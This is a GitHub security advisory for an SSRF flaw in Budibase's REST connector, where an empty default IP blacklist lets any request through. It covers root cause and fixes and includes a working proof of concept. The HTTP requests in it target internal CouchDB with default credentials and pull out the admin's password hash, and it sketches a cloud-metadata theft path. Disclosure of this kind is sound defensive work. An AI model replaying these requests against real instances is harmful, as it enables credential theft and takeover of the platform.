GHSA-7R9J-R86Q-7G45
Vulnerability from github – Published: 2026-04-03 21:34 – Updated: 2026-04-03 21:34
VLAI?
Summary
Budibase: Server-Side Request Forgery via REST Connector with Empty Default Blacklist
Details
1. Summary
| Field | Value |
|---|---|
| Title | SSRF via REST Connector with Empty Default Blacklist Leading to Full Internal Data Exfiltration |
| Product | Budibase |
| Version | 3.30.6 (latest stable as of 2026-02-25) |
| Component | REST Datasource Integration + Backend-Core Blacklist Module |
| Severity | Critical |
| Attack Vector | Network |
| Privileges Required | Low (Builder role, or QUERY WRITE for execution of pre-existing queries) |
| User Interaction | None |
| Affected Deployments | All self-hosted instances without explicit BLACKLIST_IPS configuration (believed to be the vast majority) |
2. Description
A critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase's REST datasource connector. The platform's SSRF protection mechanism (IP blacklist) is rendered completely ineffective because the BLACKLIST_IPS environment variable is not set by default in any of the official deployment configurations. When this variable is empty, the blacklist function unconditionally returns false, allowing all requests through without restriction.
This allows any user with Builder privileges (or QUERY WRITE permission on an existing query) to create REST datasources pointing to arbitrary internal network services, execute queries against them, and fully exfiltrate the responses — including credentials, database contents, and internal service metadata.
The vulnerability is particularly severe because: 1. The CouchDB backend stores all user credentials (bcrypt hashes), platform configurations, and application data 2. CouchDB credentials are embedded in the environment variables visible to the application container 3. A successful exploit grants full read/write access to the entire Budibase data layer
3. Root Cause Analysis
3.1 Blacklist Implementation
File: packages/backend-core/src/blacklist/blacklist.ts
// Line 23-37: Blacklist refresh reads from environment variable
export async function refreshBlacklist() {
const blacklist = env.BLACKLIST_IPS // ← reads BLACKLIST_IPS
const list = blacklist?.split(",") || [] // ← empty array if unset
let final: string[] = []
for (let addr of list) {
// ... resolves domains to IPs
}
blackListArray = final // ← empty array
}
// Line 39-54: Blacklist check
export async function isBlacklisted(address: string): Promise<boolean> {
if (!blackListArray) {
await refreshBlacklist()
}
if (blackListArray?.length === 0) {
return false // ← ALWAYS returns false when empty
}
// ... rest of check never executes
}
Problem: When BLACKLIST_IPS is not set (the default), blackListArray is initialized as an empty array, and isBlacklisted() unconditionally returns false for every URL.
3.2 Default Configuration Missing BLACKLIST_IPS
File: hosting/.env (official Docker Compose deployment template)
MAIN_PORT=10000
API_ENCRYPTION_KEY=testsecret
JWT_SECRET=testsecret
MINIO_ACCESS_KEY=budibase
MINIO_SECRET_KEY=budibase
COUCH_DB_PASSWORD=budibase
COUCH_DB_USER=budibase
REDIS_PASSWORD=budibase
INTERNAL_API_KEY=budibase
# ... (19 other variables)
# BLACKLIST_IPS is NOT present
No default private IP ranges (RFC1918, localhost, cloud metadata) are hardcoded as fallback.
3.3 REST Integration Blacklist Check
File: packages/server/src/integrations/rest.ts
// Line 684-686: Blacklist check before fetch
const url = this.getUrl(path, queryString, pagination, paginationValues)
if (await blacklist.isBlacklisted(url)) { // ← always false
throw new Error("Cannot connect to URL.") // ← never reached
}
// Line 708:
response = await fetch(url, input) // ← unrestricted fetch
3.4 Authorization Model
| Operation | Endpoint | Required Permission |
|---|---|---|
| Create datasource | POST /api/datasources |
BUILDER (app-level) |
| Create query | POST /api/queries |
BUILDER (app-level) |
| Execute query | POST /api/v2/queries/:id |
QUERY WRITE (can be granted to any app user) |
Route definitions:
- packages/server/src/api/routes/datasource.ts:19 → builderRoutes
- packages/server/src/api/routes/query.ts:33 → builderRoutes (create)
- packages/server/src/api/routes/query.ts:55-66 → writeRoutes with PermissionType.QUERY, PermissionLevel.WRITE (execute)
Key insight: The BUILDER role is an app-level permission, significantly lower than GLOBAL_BUILDER (platform admin). In multi-user environments, builders are expected to create app logic but are NOT expected to have access to infrastructure-level data.
4. Impact Analysis
4.1 Confidentiality — Critical
An attacker can read:
- All CouchDB databases (/_all_dbs)
- User credentials including bcrypt password hashes, email addresses (/global-db/_all_docs?include_docs=true)
- Platform configuration including encryption keys, JWT secrets
- All application data across every app in the instance
- Internal service metadata (MinIO storage, Redis)
4.2 Integrity — High
Through CouchDB's HTTP API (which supports PUT/POST/DELETE), an attacker can: - Modify user records to escalate privileges - Create new admin accounts directly in CouchDB - Alter application data in any app's database - Delete databases causing data loss
4.3 Availability — Medium
- Resource exhaustion by making the server proxy large responses from internal services
- Database destruction via CouchDB DELETE operations
- Service disruption by modifying critical configuration documents
4.4 Scope Change
The vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer. A Builder user should only be able to configure app-level logic, but this vulnerability grants direct access to:
- CouchDB (database layer)
- MinIO (storage layer)
- Redis (cache/session layer)
- Any other service accessible from the Docker network
5. Proof of Concept
5.1 Environment Setup
cd hosting/
docker compose up -d
# Wait for services to start
# Create admin account via POST /api/global/users/init
# Login to obtain session cookie
Tested on: Budibase v3.30.6, Docker Compose deployment with default hosting/.env
5.2 Step 1 — Create REST Datasource Targeting Internal CouchDB
POST /api/datasources HTTP/1.1
Host: localhost:10000
Content-Type: application/json
Cookie: budibase:auth=<session_token>
x-budibase-app-id: <app_id>
{
"datasource": {
"name": "Internal CouchDB",
"source": "REST",
"type": "datasource",
"config": {
"url": "http://couchdb-service:5984",
"defaultHeaders": {}
}
}
}
Response (201 — datasource created successfully):
{
"datasource": {
"_id": "datasource_4530e34a8b2e423f8f8eb53e2b2cefc6",
"name": "Internal CouchDB",
"source": "REST",
"config": { "url": "http://couchdb-service:5984" }
}
}
No warning, no validation error — an internal hostname is accepted without restriction.
5.3 Step 2 — Query CouchDB Version (Confirm Connectivity)
Create and execute a query to GET /:
POST /api/v2/queries/<query_id> HTTP/1.1
Response — Internal CouchDB data returned to the attacker:
{
"data": [{
"couchdb": "Welcome",
"version": "3.3.3",
"git_sha": "40afbcfc7",
"uuid": "9cd97b58e2cef72e730a83247c377d2b",
"features": ["search","access-ready","partitioned",
"pluggable-storage-engines","reshard","scheduler"],
"vendor": {"name": "The Apache Software Foundation"}
}],
"code": 200,
"time": "44ms"
}
5.4 Step 3 — Enumerate All Databases
Query: GET /_all_dbs with CouchDB admin credentials (from .env: budibase:budibase)
{
"data": [
{"value": "_replicator"},
{"value": "_users"},
{"value": "app_dev_3eeb8d7949074250ae62f206ad0b61a5"},
{"value": "app_dev_5135f7f368bc4701a7f163baaf22f1b7"},
{"value": "global-db"},
{"value": "global-info"}
]
}
5.5 Step 4 — Exfiltrate User Credentials and Platform Secrets
Query: GET /global-db/_all_docs?include_docs=true&limit=20
Headers: Authorization: Basic YnVkaWJhc2U6YnVkaWJhc2U= (budibase:budibase)
Response — Full user record with bcrypt hash:
{
"data": [{
"total_rows": 4,
"rows": [
{
"id": "config_settings",
"doc": {
"_id": "config_settings",
"type": "settings",
"config": {
"platformUrl": "http://localhost:10000",
"uniqueTenantId": "23ba9844703049778d75372e720c7169_default"
}
}
},
{
"id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
"doc": {
"_id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
"email": "admin@test.com",
"password": "$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK",
"builder": {"global": true},
"admin": {"global": true},
"tenantId": "default",
"status": "active"
}
},
{
"id": "usage_quota",
"doc": {
"_id": "usage_quota",
"quotaReset": "2026-03-01T00:00:00.000Z",
"usageQuota": {"apps": 2, "users": 1, "creators": 1}
}
}
]
}]
}
Exfiltrated data includes:
- Admin email: admin@test.com
- Bcrypt password hash: $2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK
- Role information: builder.global: true, admin.global: true
- Tenant ID, platform URL, quota information
5.6 Step 5 — Access Other Internal Services
MinIO (Object Storage):
Datasource URL: http://minio-service:9000
Response: {"Code":"BadRequest","Message":"An unsupported API call..."}
Server header: MinIO
Confirms MinIO is reachable. With proper S3 API signatures, bucket contents could be listed and files exfiltrated.
Redis (Port Scanning):
Datasource URL: http://redis-service:6379
Response: "fetch failed" (Redis speaks non-HTTP protocol)
Different error from non-existent host → confirms service discovery capability.
Non-existent service:
Datasource URL: http://nonexistent-service:12345
Response: "fetch failed"
5.7 Service Discovery Matrix
| Target | URL | Response | Service Confirmed |
|---|---|---|---|
| CouchDB | http://couchdb-service:5984/ |
{"couchdb":"Welcome","version":"3.3.3"} |
Yes — full data access |
| MinIO | http://minio-service:9000/ |
XML error with Server: MinIO header |
Yes — storage access |
| Redis | http://redis-service:6379/ |
socket hang up / fetch failed |
Yes — port open |
| Non-existent | http://nonexistent:12345/ |
fetch failed (ENOTFOUND) |
No — different error |
This differential response enables internal network mapping.
6. Attack Scenarios
Scenario A: Builder User Steals All Credentials
- User has
Builderrole for one app - Creates REST datasource →
http://couchdb-service:5984 - Queries
global-dbto get all user records with password hashes - Cracks bcrypt hashes offline or directly modifies user records via CouchDB PUT
Scenario B: Chained with CVE-2026-25040 (Unpatched Privilege Escalation)
- Attacker has
Creatorrole (lower than Builder) - Exploits CVE-2026-25040 to invite themselves as Admin
- Now has Builder access → exploits this SSRF
- Complete instance takeover
Scenario C: Cloud Metadata Exfiltration (AWS/GCP/Azure)
- On cloud-hosted instances, datasource URL:
http://169.254.169.254/latest/meta-data/ - Retrieves IAM credentials, instance metadata
- Pivots to cloud infrastructure
7. Affected Code Paths
User Request
│
▼
POST /api/datasources [BUILDER permission]
│ packages/server/src/api/routes/datasource.ts:32
│ → No URL validation on datasource.config.url
▼
POST /api/v2/queries/:queryId [QUERY WRITE permission]
│ packages/server/src/api/routes/query.ts:63
▼
packages/server/src/threads/query.ts
│ → Executes query via REST integration
▼
packages/server/src/integrations/rest.ts
│ Line 684: blacklist.isBlacklisted(url) → returns false (empty list)
│ Line 708: fetch(url, input) → unrestricted request
▼
Internal Service (CouchDB, MinIO, Redis, etc.)
│
▼
Response returned to attacker via query results
8. Recommended Fixes
Fix 1 (Critical): Add Default Private IP Blocklist
// packages/backend-core/src/blacklist/blacklist.ts
const DEFAULT_BLOCKED_RANGES = [
"127.0.0.0/8", // localhost
"10.0.0.0/8", // RFC1918
"172.16.0.0/12", // RFC1918
"192.168.0.0/16", // RFC1918
"169.254.0.0/16", // link-local / cloud metadata
"0.0.0.0/8", // current network
"::1/128", // IPv6 localhost
"fc00::/7", // IPv6 private
"fe80::/10", // IPv6 link-local
]
export async function isBlacklisted(address: string): Promise<boolean> {
// Always check against default blocked ranges
// even when BLACKLIST_IPS is not configured
const ips = await resolveToIPs(address)
for (const ip of ips) {
if (isInRange(ip, DEFAULT_BLOCKED_RANGES)) {
return true
}
}
// Then check user-configured blacklist
// ...existing logic...
}
Fix 2 (High): Validate Datasource URLs at Creation Time
// packages/server/src/api/controllers/datasource.ts
async function save(ctx) {
const { config } = ctx.request.body.datasource
if (config?.url) {
if (await blacklist.isBlacklisted(config.url)) {
ctx.throw(400, "Cannot create datasource targeting internal network")
}
}
// ... existing logic
}
Fix 3 (Medium): Add DNS Rebinding Protection
Resolve the target hostname at request time and re-check the resolved IP against the blacklist, preventing DNS rebinding attacks where the first lookup returns a public IP but the actual request resolves to an internal IP.
Fix 4 (Medium): Disable HTTP Redirects or Re-validate After Redirect
Ensure that if a response redirects to an internal IP, the redirect target is also checked against the blacklist.
Severity ?
9.6 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@budibase/backend-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.33.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31818"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T21:34:44Z",
"nvd_published_at": "2026-04-03T16:16:39Z",
"severity": "CRITICAL"
},
"details": "## 1. Summary\n\n| Field | Value |\n|-------|-------|\n| **Title** | SSRF via REST Connector with Empty Default Blacklist Leading to Full Internal Data Exfiltration |\n| **Product** | Budibase |\n| **Version** | 3.30.6 (latest stable as of 2026-02-25) |\n| **Component** | REST Datasource Integration + Backend-Core Blacklist Module |\n| **Severity** | Critical |\n| **Attack Vector** | Network |\n| **Privileges Required** | Low (Builder role, or QUERY WRITE for execution of pre-existing queries) |\n| **User Interaction** | None |\n| **Affected Deployments** | All self-hosted instances without explicit `BLACKLIST_IPS` configuration (believed to be the vast majority) |\n\n---\n\n## 2. Description\n\nA critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase\u0027s REST datasource connector. The platform\u0027s SSRF protection mechanism (IP blacklist) is rendered completely ineffective because the `BLACKLIST_IPS` environment variable is **not set by default** in any of the official deployment configurations. When this variable is empty, the blacklist function unconditionally returns `false`, allowing all requests through without restriction.\n\nThis allows any user with `Builder` privileges (or `QUERY WRITE` permission on an existing query) to create REST datasources pointing to arbitrary internal network services, execute queries against them, and fully exfiltrate the responses \u2014 including credentials, database contents, and internal service metadata.\n\nThe vulnerability is particularly severe because:\n1. The CouchDB backend stores all user credentials (bcrypt hashes), platform configurations, and application data\n2. CouchDB credentials are embedded in the environment variables visible to the application container\n3. A successful exploit grants full read/write access to the entire Budibase data layer\n\n---\n\n## 3. Root Cause Analysis\n\n### 3.1 Blacklist Implementation\n\n**File**: `packages/backend-core/src/blacklist/blacklist.ts`\n\n```typescript\n// Line 23-37: Blacklist refresh reads from environment variable\nexport async function refreshBlacklist() {\n const blacklist = env.BLACKLIST_IPS // \u2190 reads BLACKLIST_IPS\n const list = blacklist?.split(\",\") || [] // \u2190 empty array if unset\n let final: string[] = []\n for (let addr of list) {\n // ... resolves domains to IPs\n }\n blackListArray = final // \u2190 empty array\n}\n\n// Line 39-54: Blacklist check\nexport async function isBlacklisted(address: string): Promise\u003cboolean\u003e {\n if (!blackListArray) {\n await refreshBlacklist()\n }\n if (blackListArray?.length === 0) {\n return false // \u2190 ALWAYS returns false when empty\n }\n // ... rest of check never executes\n}\n```\n\n**Problem**: When `BLACKLIST_IPS` is not set (the default), `blackListArray` is initialized as an empty array, and `isBlacklisted()` unconditionally returns `false` for every URL.\n\n### 3.2 Default Configuration Missing BLACKLIST_IPS\n\n**File**: `hosting/.env` (official Docker Compose deployment template)\n\n```env\nMAIN_PORT=10000\nAPI_ENCRYPTION_KEY=testsecret\nJWT_SECRET=testsecret\nMINIO_ACCESS_KEY=budibase\nMINIO_SECRET_KEY=budibase\nCOUCH_DB_PASSWORD=budibase\nCOUCH_DB_USER=budibase\nREDIS_PASSWORD=budibase\nINTERNAL_API_KEY=budibase\n# ... (19 other variables)\n# BLACKLIST_IPS is NOT present\n```\n\nNo default private IP ranges (RFC1918, localhost, cloud metadata) are hardcoded as fallback.\n\n### 3.3 REST Integration Blacklist Check\n\n**File**: `packages/server/src/integrations/rest.ts`\n\n```typescript\n// Line 684-686: Blacklist check before fetch\nconst url = this.getUrl(path, queryString, pagination, paginationValues)\nif (await blacklist.isBlacklisted(url)) { // \u2190 always false\n throw new Error(\"Cannot connect to URL.\") // \u2190 never reached\n}\n// Line 708:\nresponse = await fetch(url, input) // \u2190 unrestricted fetch\n```\n\n### 3.4 Authorization Model\n\n| Operation | Endpoint | Required Permission |\n|-----------|----------|-------------------|\n| Create datasource | `POST /api/datasources` | `BUILDER` (app-level) |\n| Create query | `POST /api/queries` | `BUILDER` (app-level) |\n| Execute query | `POST /api/v2/queries/:id` | `QUERY WRITE` (can be granted to any app user) |\n\n**Route definitions**:\n- `packages/server/src/api/routes/datasource.ts:19` \u2192 `builderRoutes`\n- `packages/server/src/api/routes/query.ts:33` \u2192 `builderRoutes` (create)\n- `packages/server/src/api/routes/query.ts:55-66` \u2192 `writeRoutes` with `PermissionType.QUERY, PermissionLevel.WRITE` (execute)\n\n**Key insight**: The `BUILDER` role is an app-level permission, significantly lower than `GLOBAL_BUILDER` (platform admin). In multi-user environments, builders are expected to create app logic but are NOT expected to have access to infrastructure-level data.\n\n---\n\n## 4. Impact Analysis\n\n### 4.1 Confidentiality \u2014 Critical\n\nAn attacker can read:\n- **All CouchDB databases** (`/_all_dbs`)\n- **User credentials** including bcrypt password hashes, email addresses (`/global-db/_all_docs?include_docs=true`)\n- **Platform configuration** including encryption keys, JWT secrets\n- **All application data** across every app in the instance\n- **Internal service metadata** (MinIO storage, Redis)\n\n### 4.2 Integrity \u2014 High\n\nThrough CouchDB\u0027s HTTP API (which supports PUT/POST/DELETE), an attacker can:\n- **Modify user records** to escalate privileges\n- **Create new admin accounts** directly in CouchDB\n- **Alter application data** in any app\u0027s database\n- **Delete databases** causing data loss\n\n### 4.3 Availability \u2014 Medium\n\n- **Resource exhaustion** by making the server proxy large responses from internal services\n- **Database destruction** via CouchDB DELETE operations\n- **Service disruption** by modifying critical configuration documents\n\n### 4.4 Scope Change\n\nThe vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer. A `Builder` user should only be able to configure app-level logic, but this vulnerability grants direct access to:\n- CouchDB (database layer)\n- MinIO (storage layer)\n- Redis (cache/session layer)\n- Any other service accessible from the Docker network\n\n---\n\n## 5. Proof of Concept\n\n### 5.1 Environment Setup\n\n```bash\ncd hosting/\ndocker compose up -d\n# Wait for services to start\n# Create admin account via POST /api/global/users/init\n# Login to obtain session cookie\n```\n\n**Tested on**: Budibase v3.30.6, Docker Compose deployment with default `hosting/.env`\n\n### 5.2 Step 1 \u2014 Create REST Datasource Targeting Internal CouchDB\n\n```http\nPOST /api/datasources HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\nCookie: budibase:auth=\u003csession_token\u003e\nx-budibase-app-id: \u003capp_id\u003e\n\n{\n \"datasource\": {\n \"name\": \"Internal CouchDB\",\n \"source\": \"REST\",\n \"type\": \"datasource\",\n \"config\": {\n \"url\": \"http://couchdb-service:5984\",\n \"defaultHeaders\": {}\n }\n }\n}\n```\n\n**Response** (201 \u2014 datasource created successfully):\n```json\n{\n \"datasource\": {\n \"_id\": \"datasource_4530e34a8b2e423f8f8eb53e2b2cefc6\",\n \"name\": \"Internal CouchDB\",\n \"source\": \"REST\",\n \"config\": { \"url\": \"http://couchdb-service:5984\" }\n }\n}\n```\n\nNo warning, no validation error \u2014 an internal hostname is accepted without restriction.\n\n### 5.3 Step 2 \u2014 Query CouchDB Version (Confirm Connectivity)\n\nCreate and execute a query to `GET /`:\n\n```http\nPOST /api/v2/queries/\u003cquery_id\u003e HTTP/1.1\n```\n\n**Response** \u2014 Internal CouchDB data returned to the attacker:\n```json\n{\n \"data\": [{\n \"couchdb\": \"Welcome\",\n \"version\": \"3.3.3\",\n \"git_sha\": \"40afbcfc7\",\n \"uuid\": \"9cd97b58e2cef72e730a83247c377d2b\",\n \"features\": [\"search\",\"access-ready\",\"partitioned\",\n \"pluggable-storage-engines\",\"reshard\",\"scheduler\"],\n \"vendor\": {\"name\": \"The Apache Software Foundation\"}\n }],\n \"code\": 200,\n \"time\": \"44ms\"\n}\n```\n\n### 5.4 Step 3 \u2014 Enumerate All Databases\n\nQuery: `GET /_all_dbs` with CouchDB admin credentials (from `.env`: `budibase:budibase`)\n\n```json\n{\n \"data\": [\n {\"value\": \"_replicator\"},\n {\"value\": \"_users\"},\n {\"value\": \"app_dev_3eeb8d7949074250ae62f206ad0b61a5\"},\n {\"value\": \"app_dev_5135f7f368bc4701a7f163baaf22f1b7\"},\n {\"value\": \"global-db\"},\n {\"value\": \"global-info\"}\n ]\n}\n```\n\n### 5.5 Step 4 \u2014 Exfiltrate User Credentials and Platform Secrets\n\nQuery: `GET /global-db/_all_docs?include_docs=true\u0026limit=20`\nHeaders: `Authorization: Basic YnVkaWJhc2U6YnVkaWJhc2U=` (budibase:budibase)\n\n**Response** \u2014 Full user record with bcrypt hash:\n```json\n{\n \"data\": [{\n \"total_rows\": 4,\n \"rows\": [\n {\n \"id\": \"config_settings\",\n \"doc\": {\n \"_id\": \"config_settings\",\n \"type\": \"settings\",\n \"config\": {\n \"platformUrl\": \"http://localhost:10000\",\n \"uniqueTenantId\": \"23ba9844703049778d75372e720c7169_default\"\n }\n }\n },\n {\n \"id\": \"us_09c5f0a89b7f40c19db863e1aaaf90fd\",\n \"doc\": {\n \"_id\": \"us_09c5f0a89b7f40c19db863e1aaaf90fd\",\n \"email\": \"admin@test.com\",\n \"password\": \"$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK\",\n \"builder\": {\"global\": true},\n \"admin\": {\"global\": true},\n \"tenantId\": \"default\",\n \"status\": \"active\"\n }\n },\n {\n \"id\": \"usage_quota\",\n \"doc\": {\n \"_id\": \"usage_quota\",\n \"quotaReset\": \"2026-03-01T00:00:00.000Z\",\n \"usageQuota\": {\"apps\": 2, \"users\": 1, \"creators\": 1}\n }\n }\n ]\n }]\n}\n```\n\n**Exfiltrated data includes**:\n- Admin email: `admin@test.com`\n- Bcrypt password hash: `$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK`\n- Role information: `builder.global: true`, `admin.global: true`\n- Tenant ID, platform URL, quota information\n\n### 5.6 Step 5 \u2014 Access Other Internal Services\n\n**MinIO (Object Storage)**:\n```\nDatasource URL: http://minio-service:9000\nResponse: {\"Code\":\"BadRequest\",\"Message\":\"An unsupported API call...\"}\nServer header: MinIO\n```\nConfirms MinIO is reachable. With proper S3 API signatures, bucket contents could be listed and files exfiltrated.\n\n**Redis (Port Scanning)**:\n```\nDatasource URL: http://redis-service:6379\nResponse: \"fetch failed\" (Redis speaks non-HTTP protocol)\n```\nDifferent error from non-existent host \u2192 confirms service discovery capability.\n\n**Non-existent service**:\n```\nDatasource URL: http://nonexistent-service:12345\nResponse: \"fetch failed\"\n```\n\n### 5.7 Service Discovery Matrix\n\n| Target | URL | Response | Service Confirmed |\n|--------|-----|----------|-------------------|\n| CouchDB | `http://couchdb-service:5984/` | `{\"couchdb\":\"Welcome\",\"version\":\"3.3.3\"}` | Yes \u2014 full data access |\n| MinIO | `http://minio-service:9000/` | XML error with `Server: MinIO` header | Yes \u2014 storage access |\n| Redis | `http://redis-service:6379/` | `socket hang up` / `fetch failed` | Yes \u2014 port open |\n| Non-existent | `http://nonexistent:12345/` | `fetch failed` (ENOTFOUND) | No \u2014 different error |\n\nThis differential response enables internal network mapping.\n\n---\n\n## 6. Attack Scenarios\n\n### Scenario A: Builder User Steals All Credentials\n1. User has `Builder` role for one app\n2. Creates REST datasource \u2192 `http://couchdb-service:5984`\n3. Queries `global-db` to get all user records with password hashes\n4. Cracks bcrypt hashes offline or directly modifies user records via CouchDB PUT\n\n### Scenario B: Chained with CVE-2026-25040 (Unpatched Privilege Escalation)\n1. Attacker has `Creator` role (lower than Builder)\n2. Exploits CVE-2026-25040 to invite themselves as Admin\n3. Now has Builder access \u2192 exploits this SSRF\n4. Complete instance takeover\n\n### Scenario C: Cloud Metadata Exfiltration (AWS/GCP/Azure)\n1. On cloud-hosted instances, datasource URL: `http://169.254.169.254/latest/meta-data/`\n2. Retrieves IAM credentials, instance metadata\n3. Pivots to cloud infrastructure\n\n---\n\n## 7. Affected Code Paths\n\n```\nUser Request\n \u2502\n \u25bc\nPOST /api/datasources [BUILDER permission]\n \u2502 packages/server/src/api/routes/datasource.ts:32\n \u2502 \u2192 No URL validation on datasource.config.url\n \u25bc\nPOST /api/v2/queries/:queryId [QUERY WRITE permission]\n \u2502 packages/server/src/api/routes/query.ts:63\n \u25bc\npackages/server/src/threads/query.ts\n \u2502 \u2192 Executes query via REST integration\n \u25bc\npackages/server/src/integrations/rest.ts\n \u2502 Line 684: blacklist.isBlacklisted(url) \u2192 returns false (empty list)\n \u2502 Line 708: fetch(url, input) \u2192 unrestricted request\n \u25bc\nInternal Service (CouchDB, MinIO, Redis, etc.)\n \u2502\n \u25bc\nResponse returned to attacker via query results\n```\n\n---\n\n## 8. Recommended Fixes\n\n### Fix 1 (Critical): Add Default Private IP Blocklist\n\n```typescript\n// packages/backend-core/src/blacklist/blacklist.ts\n\nconst DEFAULT_BLOCKED_RANGES = [\n \"127.0.0.0/8\", // localhost\n \"10.0.0.0/8\", // RFC1918\n \"172.16.0.0/12\", // RFC1918\n \"192.168.0.0/16\", // RFC1918\n \"169.254.0.0/16\", // link-local / cloud metadata\n \"0.0.0.0/8\", // current network\n \"::1/128\", // IPv6 localhost\n \"fc00::/7\", // IPv6 private\n \"fe80::/10\", // IPv6 link-local\n]\n\nexport async function isBlacklisted(address: string): Promise\u003cboolean\u003e {\n // Always check against default blocked ranges\n // even when BLACKLIST_IPS is not configured\n const ips = await resolveToIPs(address)\n for (const ip of ips) {\n if (isInRange(ip, DEFAULT_BLOCKED_RANGES)) {\n return true\n }\n }\n // Then check user-configured blacklist\n // ...existing logic...\n}\n```\n\n### Fix 2 (High): Validate Datasource URLs at Creation Time\n\n```typescript\n// packages/server/src/api/controllers/datasource.ts\n\nasync function save(ctx) {\n const { config } = ctx.request.body.datasource\n if (config?.url) {\n if (await blacklist.isBlacklisted(config.url)) {\n ctx.throw(400, \"Cannot create datasource targeting internal network\")\n }\n }\n // ... existing logic\n}\n```\n\n### Fix 3 (Medium): Add DNS Rebinding Protection\n\nResolve the target hostname at request time and re-check the resolved IP against the blacklist, preventing DNS rebinding attacks where the first lookup returns a public IP but the actual request resolves to an internal IP.\n\n### Fix 4 (Medium): Disable HTTP Redirects or Re-validate After Redirect\n\nEnsure that if a response redirects to an internal IP, the redirect target is also checked against the blacklist.",
"id": "GHSA-7r9j-r86q-7g45",
"modified": "2026-04-03T21:34:44Z",
"published": "2026-04-03T21:34:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-7r9j-r86q-7g45"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31818"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/pull/18236"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/commit/5b0fe83d4ece52696b62589cba89ef50cc009732"
},
{
"type": "PACKAGE",
"url": "https://github.com/Budibase/budibase"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/releases/tag/3.33.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Budibase: Server-Side Request Forgery via REST Connector with Empty Default Blacklist"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…